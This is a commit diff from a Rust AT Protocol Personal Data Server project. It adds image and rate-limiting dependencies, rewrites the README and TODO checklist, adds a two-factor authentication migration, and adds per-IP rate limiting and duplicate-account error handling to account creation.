source = "registry+https://github.com/rust-lang/crates.io-index"
3590
+
checksum = "80986bbbcf925ebd3be54c26613d861255284584501595cf418320c078945608"
3591
+
dependencies = [
3592
+
"num-traits",
3593
+
"pxfm",
3594
+
]
3595
+
3596
+
[[package]]
3597
name = "multibase"
3598
version = "0.9.2"
3599
source = "registry+https://github.com/rust-lang/crates.io-index"
···
3669
"memchr",
3670
"minimal-lexical",
3671
]
3672
+
3673
+
[[package]]
3674
+
name = "nonzero_ext"
3675
+
version = "0.3.0"
3676
+
source = "registry+https://github.com/rust-lang/crates.io-index"
3677
+
checksum = "38bf9645c8b145698bb0b18a4637dcacbc421ea49bef2317e4fd8065a387cf21"
3678
3679
[[package]]
3680
name = "nu-ansi-term"
···
4099
checksum = "7edddbd0b52d732b21ad9a5fab5c704c14cd949e5e9a1ec5929a24fded1b904c"
4100
4101
[[package]]
4102
+
name = "png"
4103
+
version = "0.18.0"
4104
+
source = "registry+https://github.com/rust-lang/crates.io-index"
4105
+
checksum = "97baced388464909d42d89643fe4361939af9b7ce7a31ee32a168f832a70f2a0"
4106
+
dependencies = [
4107
+
"bitflags",
4108
+
"crc32fast",
4109
+
"fdeflate",
4110
+
"flate2",
4111
+
"miniz_oxide",
4112
+
]
4113
+
4114
+
[[package]]
4115
name = "polyval"
4116
version = "0.6.2"
4117
source = "registry+https://github.com/rust-lang/crates.io-index"
···
4268
]
4269
4270
[[package]]
4271
+
name = "pxfm"
4272
+
version = "0.1.27"
4273
+
source = "registry+https://github.com/rust-lang/crates.io-index"
4274
+
checksum = "7186d3822593aa4393561d186d1393b3923e9d6163d3fbfd6e825e3e6cf3e6a8"
4275
+
dependencies = [
4276
+
"num-traits",
4277
+
]
4278
+
4279
+
[[package]]
4280
+
name = "quanta"
4281
+
version = "0.12.6"
4282
+
source = "registry+https://github.com/rust-lang/crates.io-index"
4283
+
checksum = "f3ab5a9d756f0d97bdc89019bd2e4ea098cf9cde50ee7564dde6b81ccc8f06c7"
4284
+
dependencies = [
4285
+
"crossbeam-utils",
4286
+
"libc",
4287
+
"once_cell",
4288
+
"raw-cpuid",
4289
+
"wasi",
4290
+
"web-sys",
4291
+
"winapi",
4292
+
]
4293
+
4294
+
[[package]]
4295
+
name = "quick-error"
4296
+
version = "2.0.1"
4297
+
source = "registry+https://github.com/rust-lang/crates.io-index"
4298
+
checksum = "a993555f31e5a609f617c12db6250dedcac1b0a85076912c436e6fc9b2c8e6a3"
4299
+
4300
+
[[package]]
4301
name = "quinn"
4302
version = "0.11.9"
4303
source = "registry+https://github.com/rust-lang/crates.io-index"
···
4431
version = "0.3.2"
4432
source = "registry+https://github.com/rust-lang/crates.io-index"
4433
checksum = "d20581732dd76fa913c7dff1a2412b714afe3573e94d41c34719de73337cc8ab"
4434
+
4435
+
[[package]]
4436
+
name = "raw-cpuid"
4437
+
version = "11.6.0"
4438
+
source = "registry+https://github.com/rust-lang/crates.io-index"
4439
+
checksum = "498cd0dc59d73224351ee52a95fee0f1a617a2eae0e7d9d720cc622c73a54186"
4440
+
dependencies = [
4441
+
"bitflags",
4442
+
]
4443
4444
[[package]]
4445
name = "redox_syscall"
···
5209
checksum = "d5fe4ccb98d9c292d56fec89a5e07da7fc4cf0dc11e156b41793132775d3e591"
5210
5211
[[package]]
5212
+
name = "spinning_top"
5213
+
version = "0.3.0"
5214
+
source = "registry+https://github.com/rust-lang/crates.io-index"
5215
+
checksum = "d96d2d1d716fb500937168cc09353ffdc7a012be8475ac7308e1bdf0e3923300"
5216
+
dependencies = [
5217
+
"lock_api",
5218
+
]
5219
+
5220
+
[[package]]
5221
name = "spki"
5222
version = "0.6.0"
5223
source = "registry+https://github.com/rust-lang/crates.io-index"
···
6405
]
6406
6407
[[package]]
6408
+
name = "weezl"
6409
+
version = "0.1.12"
6410
+
source = "registry+https://github.com/rust-lang/crates.io-index"
6411
+
checksum = "a28ac98ddc8b9274cb41bb4d9d4d5c425b6020c50c46f25559911905610b4a88"
6412
+
6413
+
[[package]]
6414
name = "whoami"
6415
version = "1.6.1"
6416
source = "registry+https://github.com/rust-lang/crates.io-index"
···
7021
"quote",
7022
"syn 2.0.111",
7023
]
7024
+
7025
+
[[package]]
7026
+
name = "zune-core"
7027
+
version = "0.5.0"
7028
+
source = "registry+https://github.com/rust-lang/crates.io-index"
7029
+
checksum = "111f7d9820f05fd715df3144e254d6fc02ee4088b0644c0ffd0efc9e6d9d2773"
7030
+
7031
+
[[package]]
7032
+
name = "zune-jpeg"
7033
+
version = "0.5.6"
7034
+
source = "registry+https://github.com/rust-lang/crates.io-index"
7035
+
checksum = "f520eebad972262a1dde0ec455bce4f8b298b1e5154513de58c114c4c54303e8"
7036
+
dependencies = [
7037
+
"zune-core",
7038
+
]
+2 Cargo.toml
···
16
cid = "0.11.1"
17
dotenvy = "0.15.7"
18
futures = "0.3.30"
19
+
governor = "0.10"
20
hkdf = "0.12"
21
hmac = "0.12"
22
aes-gcm = "0.10"
···
48
urlencoding = "2.1"
49
uuid = { version = "1.19.0", features = ["v4", "fast-rng"] }
50
iroh-car = "0.5.1"
51
+
image = { version = "0.25", default-features = false, features = ["jpeg", "png", "gif", "webp"] }
52
53
[features]
54
external-infra = []
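The new `image` dependency (jpeg/png/gif/webp features) backs the blob thumbnail pipeline mentioned in TODO.md. A minimal sketch of such a step, assuming a 512x512 bound and lossless WebP output (the real pipeline lives in `src/` and is not shown in this diff):

```rust
use std::io::Cursor;
use image::{DynamicImage, ImageFormat};

// Sketch of a thumbnail step using the `image` crate features enabled above.
fn make_thumbnail(original: &[u8]) -> Result<Vec<u8>, image::ImageError> {
    // Decoding ignores EXIF, so re-encoding also strips metadata from the output.
    let img: DynamicImage = image::load_from_memory(original)?;
    let thumb = img.thumbnail(512, 512); // preserves aspect ratio

    let mut out = Cursor::new(Vec::new());
    thumb.write_to(&mut out, ImageFormat::WebP)?; // lossless WebP encoder
    Ok(out.into_inner())
}
```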
+79 -51 README.md
···
1
-
# Lewis' BS PDS Sandbox
2
3
-
When I'm actually done then yeah let's make this into a proper official-looking repo perhaps under an official-looking account or something.
4
5
-
This project implements a Personal Data Server (PDS) implementation for the AT Protocol.
6
7
-
Uses PostgreSQL instead of SQLite, S3-compatible blob storage, and aims to be a complete drop-in replacement for Bluesky's reference PDS implementation.
8
9
-
In fact I aim to also implement a plugin system soon, so that we can add things onto our own PDSes on top of the default BS.
10
11
-
I'm also taking ideas on what other PDSes lack, such as an on-PDS webpage that users can access to manage their records and preferences.
12
13
-
:3
14
15
-
# Running locally
16
17
-
The reader will need rust installed locally.
18
19
-
I personally run the postgres db, and an S3-compatible object store with podman compose up db objsto -d.
20
21
-
Run the PDS directly:
22
23
-
just run
24
-
25
-
Configuration is via environment variables:
26
27
-
DATABASE_URL postgres connection string
28
-
S3_BUCKET blob storage bucket name
29
-
S3_ENDPOINT S3 endpoint URL (for MinIO etc)
30
-
AWS_ACCESS_KEY_ID S3 credentials
31
-
AWS_SECRET_ACCESS_KEY
32
-
AWS_REGION
33
-
PDS_HOSTNAME public hostname of this PDS
34
-
APPVIEW_URL appview to proxy unimplemented endpoints to
35
-
RELAYS comma-separated list of relay WebSocket URLs
36
37
-
Optional email stuff:
38
39
-
MAIL_FROM_ADDRESS sender address (enables email notifications)
40
-
MAIL_FROM_NAME sender name (default: BSPDS)
41
-
SENDMAIL_PATH path to sendmail binary
42
43
-
Development
44
45
-
just shows available commands
46
-
just test run tests (spins up postgres and minio via testcontainers)
47
-
just lint clippy + fmt check
48
-
just db-reset drop and recreate local database
49
50
-
The test suite uses testcontainers so you don't need to set up anything manually for running tests.
51
52
-
## What's implemented
53
54
-
Most of the com.atproto.* namespace is done. Server endpoints, repo operations, sync, identity, admin, moderation. The firehose websocket works. OAuth is not done yet.
55
56
-
See TODO.md for the full breakdown of what's done and what's left.
57
58
-
Structure
59
60
-
src/
61
-
main.rs server entrypoint
62
-
lib.rs router setup
63
-
state.rs app state (db pool, stores)
64
-
api/ XRPC handlers organized by namespace
65
-
auth/ JWT handling
66
-
repo/ postgres block store
67
-
storage/ S3 blob storage
68
-
sync/ firehose, relay clients
69
-
notifications/ email service
70
-
tests/ integration tests
71
-
migrations/ sqlx migrations
72
73
-
License
74
75
-
idk
···
1
+
# BSPDS, a Personal Data Server
2
3
+
A production-grade Personal Data Server (PDS) implementation for the AT Protocol.
4
5
+
Uses PostgreSQL instead of SQLite, S3-compatible blob storage, and is designed to be a complete drop-in replacement for Bluesky's reference PDS implementation.
6
7
+
## Features
8
9
+
- Full AT Protocol support: all `com.atproto.*` endpoints implemented
10
+
- OAuth 2.1 provider with PKCE, DPoP, and Pushed Authorization Requests
11
+
- PostgreSQL as a production-ready database backend
12
+
- S3-compatible object storage for blobs; works with AWS S3, UpCloud object storage, self-hosted MinIO, etc.
13
+
- WebSocket `subscribeRepos` endpoint for real-time sync
14
+
- Crawler notifications via `requestCrawl`
15
+
- Multi-channel notifications: email, Discord, Telegram, Signal
16
+
- Per-IP rate limiting on sensitive endpoints
17
18
+
## Running Locally
19
20
+
Requires Rust installed locally.
21
22
+
Run PostgreSQL and an S3-compatible object store (e.g., with podman or docker):
23
24
+
```bash
25
+
podman compose up db objsto -d
26
+
```
27
28
+
Run the PDS:
29
30
+
```bash
31
+
just run
32
+
```
33
34
+
## Configuration
35
36
+
### Required
37
38
+
| Variable | Description |
39
+
|----------|-------------|
40
+
| `DATABASE_URL` | PostgreSQL connection string |
41
+
| `S3_BUCKET` | Blob storage bucket name |
42
+
| `S3_ENDPOINT` | S3 endpoint URL (for MinIO, etc.) |
43
+
| `AWS_ACCESS_KEY_ID` | S3 credentials |
44
+
| `AWS_SECRET_ACCESS_KEY` | S3 credentials |
45
+
| `AWS_REGION` | S3 region |
46
+
| `PDS_HOSTNAME` | Public hostname of this PDS |
47
+
| `JWT_SECRET` | Secret for OAuth token signing (HS256) |
48
+
| `KEY_ENCRYPTION_KEY` | Key for encrypting user signing keys (AES-256-GCM) |
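A minimal sketch (not the project's actual startup code) of failing fast on the required variables above, using the existing `dotenvy` dependency:

```rust
use std::env;

// Load .env if present, then insist on the required settings.
fn load_required_config() -> Result<(String, String), String> {
    dotenvy::dotenv().ok(); // ignore a missing .env file

    let database_url = env::var("DATABASE_URL")
        .map_err(|_| "DATABASE_URL must be set".to_string())?;
    let pds_hostname = env::var("PDS_HOSTNAME")
        .map_err(|_| "PDS_HOSTNAME must be set".to_string())?;

    Ok((database_url, pds_hostname))
}
```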
49
50
+
### Optional
51
52
+
| Variable | Description |
53
+
|----------|-------------|
54
+
| `APPVIEW_URL` | Appview URL to proxy unimplemented endpoints to |
55
+
| `CRAWLERS` | Comma-separated list of relay URLs to notify via `requestCrawl` |
56
57
+
### Notifications
58
59
+
At least one channel should be configured for user notifications (password reset, email verification, etc.):
60
61
+
| Variable | Description |
62
+
|----------|-------------|
63
+
| `MAIL_FROM_ADDRESS` | Email sender address (enables email via sendmail) |
64
+
| `MAIL_FROM_NAME` | Email sender name (default: "BSPDS") |
65
+
| `SENDMAIL_PATH` | Path to sendmail binary (default: /usr/sbin/sendmail) |
66
+
| `DISCORD_WEBHOOK_URL` | Discord webhook URL for notifications |
67
+
| `TELEGRAM_BOT_TOKEN` | Telegram bot token for notifications |
68
+
| `SIGNAL_CLI_PATH` | Path to signal-cli binary |
69
+
| `SIGNAL_SENDER_NUMBER` | Signal sender phone number (+1234567890 format) |
70
71
+
## Development
72
73
+
```bash
74
+
just # Show available commands
75
+
just test # Run tests (auto-starts postgres/minio, runs nextest)
76
+
just lint # Clippy + fmt check
77
+
just db-reset # Drop and recreate local database
78
+
```
79
80
+
## Project Structure
81
82
+
```
83
+
src/
84
+
main.rs Server entrypoint
85
+
lib.rs Router setup
86
+
state.rs AppState (db pool, stores, rate limiters, circuit breakers)
87
+
api/ XRPC handlers organized by namespace
88
+
auth/ JWT authentication (ES256K per-user keys)
89
+
oauth/ OAuth 2.1 provider (HS256 server-wide)
90
+
repo/ PostgreSQL block store
91
+
storage/ S3 blob storage
92
+
sync/ Firehose, CAR export, crawler notifications
93
+
notifications/ Multi-channel notification service
94
+
plc/ PLC directory client
95
+
circuit_breaker/ Circuit breaker for external services
96
+
rate_limit/ Per-IP rate limiting
97
+
tests/ Integration tests
98
+
migrations/ SQLx migrations
99
+
```
100
101
+
## License
102
103
+
TBD
+49 -37 TODO.md
···
81
- [x] Implement `com.atproto.sync.listBlobs`.
82
- [x] Crawler Interaction
83
- [x] Implement `com.atproto.sync.requestCrawl` (Notify relays to index us).
84
85
## Identity (`com.atproto.identity`)
86
- [x] Resolution
···
108
- [x] Implement `com.atproto.moderation.createReport`.
109
110
## Temp Namespace (`com.atproto.temp`)
111
-
- [ ] Implement `com.atproto.temp.checkSignupQueue` (signup queue status for gated signups).
112
113
## OAuth 2.1 Support
114
Full OAuth 2.1 provider for ATProto native app authentication.
115
- [x] OAuth Provider Core
116
- [x] Implement `/.well-known/oauth-protected-resource` metadata endpoint.
117
- [x] Implement `/.well-known/oauth-authorization-server` metadata endpoint.
118
-
- [x] Implement `/oauth/authorize` authorization endpoint (headless JSON mode).
119
- [x] Implement `/oauth/par` Pushed Authorization Request endpoint.
120
- [x] Implement `/oauth/token` token endpoint (authorization_code + refresh_token grants).
121
- [x] Implement `/oauth/jwks` JSON Web Key Set endpoint.
···
132
- [x] Client metadata fetching and validation.
133
- [x] PKCE (S256) enforcement.
134
- [x] OAuth token verification extractor for protected resources.
135
-
- [ ] Authorization UI templates (currently headless-only, returns JSON for programmatic flows).
136
-
- [ ] Implement `private_key_jwt` signature verification (currently rejects with clear error).
137
138
## OAuth Security Notes
139
140
-
I've tried to ensure that this codebase is not vulnerable to the following:
141
142
- Constant-time comparison for signature verification (prevents timing attacks)
143
- HMAC-SHA256 for access token signing with configurable secret
···
151
- All database queries use parameterized statements (no SQL injection)
152
- Deactivated/taken-down accounts blocked from OAuth authorization
153
- Client ID validation on token exchange (defense-in-depth against cross-client attacks)
154
155
### Auth Notes
156
-
- Algorithm choice: Using ES256K (secp256k1 ECDSA) with per-user keys. Ref PDS uses HS256 (HMAC) with single server key. Our approach provides better key isolation but differs from reference implementation.
157
-
- [ ] Support the ref PDS HS256 system too.
158
-
- Token storage: Now storing only token JTIs in session_tokens table (defense in depth against DB breaches). Refresh token family tracking enables detection of token reuse attacks.
159
-
- Key encryption: User signing keys encrypted at rest using AES-256-GCM with keys derived via HKDF from MASTER_KEY environment variable. Migration-safe: supports both encrypted (version 1) and plaintext (version 0) keys.
160
161
## PDS-Level App Endpoints
162
These endpoints need to be implemented at the PDS level (not just proxied to appview).
···
178
### Notification (`app.bsky.notification`)
179
- [x] Implement `app.bsky.notification.registerPush` (push notification registration, proxied).
180
181
-
## Deprecated Sync Endpoints (for compatibility)
182
-
- [ ] Implement `com.atproto.sync.getCheckout` (deprecated, still needed for compatibility).
183
-
- [ ] Implement `com.atproto.sync.getHead` (deprecated, still needed for compatibility).
184
-
185
-
## Misc HTTP Endpoints
186
-
- [ ] Implement `/robots.txt` endpoint.
187
-
188
-
## Record Schema Validation
189
-
- [ ] Handle this generically.
190
-
191
-
## Preference Storage
192
-
User preferences (for app.bsky.actor.getPreferences/putPreferences):
193
-
- [x] Create preferences table for storing user app preferences.
194
-
- [x] Implement `app.bsky.actor.getPreferences` handler (read from postgres, proxy fallback).
195
-
- [x] Implement `app.bsky.actor.putPreferences` handler (write to postgres).
196
-
197
## Infrastructure & Core Components
198
- [x] Sequencer (Event Log)
199
- [x] Implement a `Sequencer` (backed by `repo_seq` table).
···
206
- [x] Manage Repo Root in `repos` table.
207
- [x] Implement Atomic Repo Transactions.
208
- [x] Ensure `blocks` write, `repo_root` update, `records` index update, and `sequencer` event are committed in a single transaction.
209
-
- [ ] Implement concurrency control (row-level locking on `repos` table) to prevent concurrent writes to the same repo.
210
- [ ] DID Cache
211
- [ ] Implement caching layer for DID resolution (Redis or in-memory).
212
- [ ] Handle cache invalidation/expiry.
213
-
- [ ] Background Jobs
214
-
- [ ] Implement `Crawlers` service (debounce notifications to relays).
215
- [x] Notification Service
216
- [x] Queue-based notification system with database table
217
- [x] Background worker polling for pending notifications
218
- [x] Extensible sender trait for multiple channels
219
- [x] Email sender via OS sendmail/msmtp
220
-
- [ ] Discord bot sender
221
-
- [ ] Telegram bot sender
222
-
- [ ] Signal bot sender
223
- [x] Helper functions for common notification types (welcome, password reset, email verification, etc.)
224
- [x] Respect user's `preferred_notification_channel` setting for non-email-specific notifications
225
-
- [ ] Image Processing
226
-
- [ ] Implement image resize/formatting pipeline (for blob uploads).
227
- [x] IPLD & MST
228
- [x] Implement Merkle Search Tree logic for repo signing.
229
- [x] Implement CAR (Content Addressable Archive) encoding/decoding.
230
-
- [ ] Validation
231
-
- [ ] DID PLC Operations (Sign rotation keys).
232
-
- [ ] Fix any remaining TODOs in the code, everywhere, full stop.
233
234
-
## Web Management UI
235
A single-page web app for account management. The frontend (JS framework) calls existing ATProto XRPC endpoints - no server-side rendering or bespoke HTML form handlers.
236
237
### Architecture
···
81
- [x] Implement `com.atproto.sync.listBlobs`.
82
- [x] Crawler Interaction
83
- [x] Implement `com.atproto.sync.requestCrawl` (Notify relays to index us).
84
+
- [x] Deprecated Sync Endpoints (for compatibility)
85
+
- [x] Implement `com.atproto.sync.getCheckout` (deprecated).
86
+
- [x] Implement `com.atproto.sync.getHead` (deprecated).
87
88
## Identity (`com.atproto.identity`)
89
- [x] Resolution
···
111
- [x] Implement `com.atproto.moderation.createReport`.
112
113
## Temp Namespace (`com.atproto.temp`)
114
+
- [x] Implement `com.atproto.temp.checkSignupQueue` (signup queue status for gated signups).
115
+
116
+
## Misc HTTP Endpoints
117
+
- [x] Implement `/robots.txt` endpoint.
118
119
## OAuth 2.1 Support
120
Full OAuth 2.1 provider for ATProto native app authentication.
121
- [x] OAuth Provider Core
122
- [x] Implement `/.well-known/oauth-protected-resource` metadata endpoint.
123
- [x] Implement `/.well-known/oauth-authorization-server` metadata endpoint.
124
+
- [x] Implement `/oauth/authorize` authorization endpoint (with login UI).
125
- [x] Implement `/oauth/par` Pushed Authorization Request endpoint.
126
- [x] Implement `/oauth/token` token endpoint (authorization_code + refresh_token grants).
127
- [x] Implement `/oauth/jwks` JSON Web Key Set endpoint.
···
138
- [x] Client metadata fetching and validation.
139
- [x] PKCE (S256) enforcement.
140
- [x] OAuth token verification extractor for protected resources.
141
+
- [x] Authorization UI templates (HTML login form).
142
+
- [x] Implement `private_key_jwt` signature verification with async JWKS fetching.
143
+
- [x] HS256 JWT support (matches reference PDS).
144
145
## OAuth Security Notes
146
147
+
Security measures implemented:
148
149
- Constant-time comparison for signature verification (prevents timing attacks)
150
- HMAC-SHA256 for access token signing with configurable secret
···
158
- All database queries use parameterized statements (no SQL injection)
159
- Deactivated/taken-down accounts blocked from OAuth authorization
160
- Client ID validation on token exchange (defense-in-depth against cross-client attacks)
161
+
- HTML escaping in OAuth templates (XSS prevention)
162
163
### Auth Notes
164
+
- Dual algorithm support: ES256K (secp256k1 ECDSA) with per-user keys and HS256 (HMAC) for compatibility with the reference PDS.
165
+
- Token storage: Storing only token JTIs in session_tokens table (defense in depth against DB breaches). Refresh token family tracking enables detection of token reuse attacks.
166
+
- Key encryption: User signing keys encrypted at rest using AES-256-GCM with keys derived via HKDF from KEY_ENCRYPTION_KEY environment variable.
167
168
## PDS-Level App Endpoints
169
These endpoints need to be implemented at the PDS level (not just proxied to appview).
···
185
### Notification (`app.bsky.notification`)
186
- [x] Implement `app.bsky.notification.registerPush` (push notification registration, proxied).
187
188
## Infrastructure & Core Components
189
- [x] Sequencer (Event Log)
190
- [x] Implement a `Sequencer` (backed by `repo_seq` table).
···
197
- [x] Manage Repo Root in `repos` table.
198
- [x] Implement Atomic Repo Transactions.
199
- [x] Ensure `blocks` write, `repo_root` update, `records` index update, and `sequencer` event are committed in a single transaction.
200
+
- [x] Implement concurrency control (row-level locking via FOR UPDATE).
201
- [ ] DID Cache
202
- [ ] Implement caching layer for DID resolution (Redis or in-memory).
203
- [ ] Handle cache invalidation/expiry.
204
+
- [x] Crawlers Service
205
+
- [x] Implement `Crawlers` service (debounce notifications to relays).
206
+
- [x] 20-minute notification debounce.
207
+
- [x] Circuit breaker for relay failures.
208
- [x] Notification Service
209
- [x] Queue-based notification system with database table
210
- [x] Background worker polling for pending notifications
211
- [x] Extensible sender trait for multiple channels
212
- [x] Email sender via OS sendmail/msmtp
213
+
- [x] Discord webhook sender
214
+
- [x] Telegram bot sender
215
+
- [x] Signal CLI sender
216
- [x] Helper functions for common notification types (welcome, password reset, email verification, etc.)
217
- [x] Respect user's `preferred_notification_channel` setting for non-email-specific notifications
218
+
- [x] Image Processing
219
+
- [x] Implement image resize/formatting pipeline (for blob uploads).
220
+
- [x] WebP conversion for thumbnails.
221
+
- [x] EXIF stripping.
222
+
- [x] File size limits (10MB default).
223
- [x] IPLD & MST
224
- [x] Implement Merkle Search Tree logic for repo signing.
225
- [x] Implement CAR (Content Addressable Archive) encoding/decoding.
226
+
- [x] Cycle detection in CAR export.
227
+
- [x] Rate Limiting (see the sketch after this checklist)
228
+
- [x] Per-IP rate limiting on login (10/min).
229
+
- [x] Per-IP rate limiting on OAuth token endpoint (30/min).
230
+
- [x] Per-IP rate limiting on password reset (5/hour).
231
+
- [x] Per-IP rate limiting on account creation (10/hour).
232
+
- [x] Circuit Breakers
233
+
- [x] PLC directory circuit breaker (5 failures → open, 60s timeout).
234
+
- [x] Relay notification circuit breaker (10 failures → open, 30s timeout).
235
+
- [x] Security Hardening
236
+
- [x] Email header injection prevention (CRLF sanitization).
237
+
- [x] Signal command injection prevention (phone number validation).
238
+
- [x] Constant-time signature comparison.
239
+
- [x] SSRF protection for outbound requests.
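As referenced in the Rate Limiting item above, a sketch of how the listed per-IP quotas might be declared with the `governor` crate; the field names mirror the `state.rate_limiters.*` usage in the account-creation handler, but the real struct is not part of this diff:

```rust
use std::num::NonZeroU32;
use governor::{DefaultKeyedRateLimiter, Quota, RateLimiter};

// Hypothetical container for the keyed (per-IP) limiters listed above.
pub struct RateLimiters {
    pub login: DefaultKeyedRateLimiter<String>,            // 10/min
    pub oauth_token: DefaultKeyedRateLimiter<String>,      // 30/min
    pub password_reset: DefaultKeyedRateLimiter<String>,   // 5/hour
    pub account_creation: DefaultKeyedRateLimiter<String>, // 10/hour
}

impl RateLimiters {
    pub fn new() -> Self {
        let per_min = |n| Quota::per_minute(NonZeroU32::new(n).unwrap());
        let per_hour = |n| Quota::per_hour(NonZeroU32::new(n).unwrap());
        Self {
            login: RateLimiter::keyed(per_min(10)),
            oauth_token: RateLimiter::keyed(per_min(30)),
            password_reset: RateLimiter::keyed(per_hour(5)),
            account_creation: RateLimiter::keyed(per_hour(10)),
        }
    }
}
```

Handlers then call e.g. `limiters.account_creation.check_key(&client_ip)` and map a rejection to HTTP 429, as the account-creation handler later in this diff does.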
240
241
+
## Lewis' fabulous mini-list of remaining TODOs
242
+
- [ ] DID resolution caching (valkey).
243
+
- [ ] Record schema validation (generic validation framework).
244
+
- [ ] Fix any remaining TODOs in the code.
245
+
246
+
## Future: Web Management UI
247
A single-page web app for account management. The frontend (JS framework) calls existing ATProto XRPC endpoints - no server-side rendering or bespoke HTML form handlers.
248
249
### Architecture
+16 migrations/202512211700_add_2fa.sql
···
···
1
+
ALTER TABLE users ADD COLUMN two_factor_enabled BOOLEAN NOT NULL DEFAULT FALSE;
2
+
3
+
ALTER TYPE notification_type ADD VALUE 'two_factor_code';
4
+
5
+
CREATE TABLE oauth_2fa_challenge (
6
+
id UUID PRIMARY KEY DEFAULT gen_random_uuid(),
7
+
did TEXT NOT NULL REFERENCES users(did) ON DELETE CASCADE,
8
+
request_uri TEXT NOT NULL,
9
+
code TEXT NOT NULL,
10
+
attempts INTEGER NOT NULL DEFAULT 0,
11
+
created_at TIMESTAMPTZ NOT NULL DEFAULT NOW(),
12
+
expires_at TIMESTAMPTZ NOT NULL DEFAULT NOW() + INTERVAL '10 minutes'
13
+
);
14
+
15
+
CREATE INDEX idx_oauth_2fa_challenge_request_uri ON oauth_2fa_challenge(request_uri);
16
+
CREATE INDEX idx_oauth_2fa_challenge_expires ON oauth_2fa_challenge(expires_at);
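To illustrate how this table is used, a hedged sketch of the attempt-counting step, built from the prepared statements in the `.sqlx` files above (the `MAX_ATTEMPTS` value is an assumption; the real limit is not shown in this diff):

```rust
use sqlx::PgPool;
use uuid::Uuid;

// Assumed limit on wrong codes before the challenge is discarded.
const MAX_ATTEMPTS: i32 = 5;

// Bump the attempt counter for a 2FA challenge and delete the row once
// too many wrong codes have been entered. Returns whether a retry is allowed.
async fn register_failed_attempt(db: &PgPool, challenge_id: Uuid) -> Result<bool, sqlx::Error> {
    let attempts: i32 = sqlx::query_scalar(
        "UPDATE oauth_2fa_challenge SET attempts = attempts + 1 WHERE id = $1 RETURNING attempts",
    )
    .bind(challenge_id)
    .fetch_one(db)
    .await?;

    if attempts >= MAX_ATTEMPTS {
        sqlx::query("DELETE FROM oauth_2fa_challenge WHERE id = $1")
            .bind(challenge_id)
            .execute(db)
            .await?;
        return Ok(false); // challenge exhausted
    }
    Ok(true)
}
```

Expiry cleanup is handled separately by the `DELETE FROM oauth_2fa_challenge WHERE expires_at < NOW()` statement shown earlier in this diff.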
+65 -2 src/api/identity/account.rs
···
3
use axum::{
4
Json,
5
extract::State,
6
-
http::StatusCode,
7
response::{IntoResponse, Response},
8
};
9
use bcrypt::{DEFAULT_COST, hash};
···
16
use std::sync::Arc;
17
use tracing::{error, info, warn};
18
19
#[derive(Deserialize)]
20
#[serde(rename_all = "camelCase")]
21
pub struct CreateAccountInput {
···
38
39
pub async fn create_account(
40
State(state): State<AppState>,
41
Json(input): Json<CreateAccountInput>,
42
) -> Response {
43
info!("create_account called");
44
if input.handle.contains('!') || input.handle.contains('@') {
45
return (
46
StatusCode::BAD_REQUEST,
···
184
let user_id = match user_insert {
185
Ok(row) => row.id,
186
Err(e) => {
187
error!("Error inserting user: {:?}", e);
188
-
// TODO: Check for unique constraint violation on email/did specifically
189
return (
190
StatusCode::INTERNAL_SERVER_ERROR,
191
Json(json!({"error": "InternalError"})),
···
3
use axum::{
4
Json,
5
extract::State,
6
+
http::{HeaderMap, StatusCode},
7
response::{IntoResponse, Response},
8
};
9
use bcrypt::{DEFAULT_COST, hash};
···
16
use std::sync::Arc;
17
use tracing::{error, info, warn};
18
19
+
fn extract_client_ip(headers: &HeaderMap) -> String {
20
+
if let Some(forwarded) = headers.get("x-forwarded-for") {
21
+
if let Ok(value) = forwarded.to_str() {
22
+
if let Some(first_ip) = value.split(',').next() {
23
+
return first_ip.trim().to_string();
24
+
}
25
+
}
26
+
}
27
+
if let Some(real_ip) = headers.get("x-real-ip") {
28
+
if let Ok(value) = real_ip.to_str() {
29
+
return value.trim().to_string();
30
+
}
31
+
}
32
+
"unknown".to_string()
33
+
}
34
+
35
#[derive(Deserialize)]
36
#[serde(rename_all = "camelCase")]
37
pub struct CreateAccountInput {
···
54
55
pub async fn create_account(
56
State(state): State<AppState>,
57
+
headers: HeaderMap,
58
Json(input): Json<CreateAccountInput>,
59
) -> Response {
60
info!("create_account called");
61
+
62
+
let client_ip = extract_client_ip(&headers);
63
+
if state.rate_limiters.account_creation.check_key(&client_ip).is_err() {
64
+
warn!(ip = %client_ip, "Account creation rate limit exceeded");
65
+
return (
66
+
StatusCode::TOO_MANY_REQUESTS,
67
+
Json(json!({
68
+
"error": "RateLimitExceeded",
69
+
"message": "Too many account creation attempts. Please try again later."
70
+
})),
71
+
)
72
+
.into_response();
73
+
}
74
+
75
if input.handle.contains('!') || input.handle.contains('@') {
76
return (
77
StatusCode::BAD_REQUEST,
···
215
let user_id = match user_insert {
216
Ok(row) => row.id,
217
Err(e) => {
218
+
if let Some(db_err) = e.as_database_error() {
219
+
if db_err.code().as_deref() == Some("23505") {
220
+
let constraint = db_err.constraint().unwrap_or("");
221
+
if constraint.contains("handle") || constraint.contains("users_handle") {
222
+
return (
223
+
StatusCode::BAD_REQUEST,
224
+
Json(json!({
225
+
"error": "HandleNotAvailable",
226
+
"message": "Handle already taken"
227
+
})),
228
+
)
229
+
.into_response();
230
+
} else if constraint.contains("email") || constraint.contains("users_email") {
231
+
return (
232
+
StatusCode::BAD_REQUEST,
233
+
Json(json!({
234
+
"error": "InvalidEmail",
235
+
"message": "Email already registered"
236
+
})),
237
+
)
238
+
.into_response();
239
+
} else if constraint.contains("did") || constraint.contains("users_did") {
240
+
return (
241
+
StatusCode::BAD_REQUEST,
242
+
Json(json!({
243
+
"error": "AccountAlreadyExists",
244
+
"message": "An account with this DID already exists"
245
+
})),
246
+
)
247
+
.into_response();
248
+
}
249
+
}
250
+
}
251
error!("Error inserting user: {:?}", e);
252
return (
253
StatusCode::INTERNAL_SERVER_ERROR,
254
Json(json!({"error": "InternalError"})),
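Since `extract_client_ip` trusts proxy-supplied headers, a small hypothetical test (not present in this diff) of the intended first-hop behaviour:

```rust
#[cfg(test)]
mod client_ip_tests {
    use axum::http::HeaderMap;

    // The first entry of a comma-separated X-Forwarded-For chain is the client.
    #[test]
    fn forwarded_for_uses_first_hop() {
        let mut headers = HeaderMap::new();
        headers.insert("x-forwarded-for", "203.0.113.7, 10.0.0.1".parse().unwrap());
        assert_eq!(super::extract_client_ip(&headers), "203.0.113.7");
    }

    // With no proxy headers at all, the handler rate-limits under "unknown".
    #[test]
    fn missing_headers_fall_back_to_unknown() {
        assert_eq!(super::extract_client_ip(&HeaderMap::new()), "unknown");
    }
}
```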
+24 -5 src/api/identity/plc/sign.rs
···
1
use crate::api::ApiError;
2
use crate::plc::{
3
-
create_update_op, sign_operation, PlcClient, PlcError, PlcService,
4
};
5
use crate::state::AppState;
6
use axum::{
···
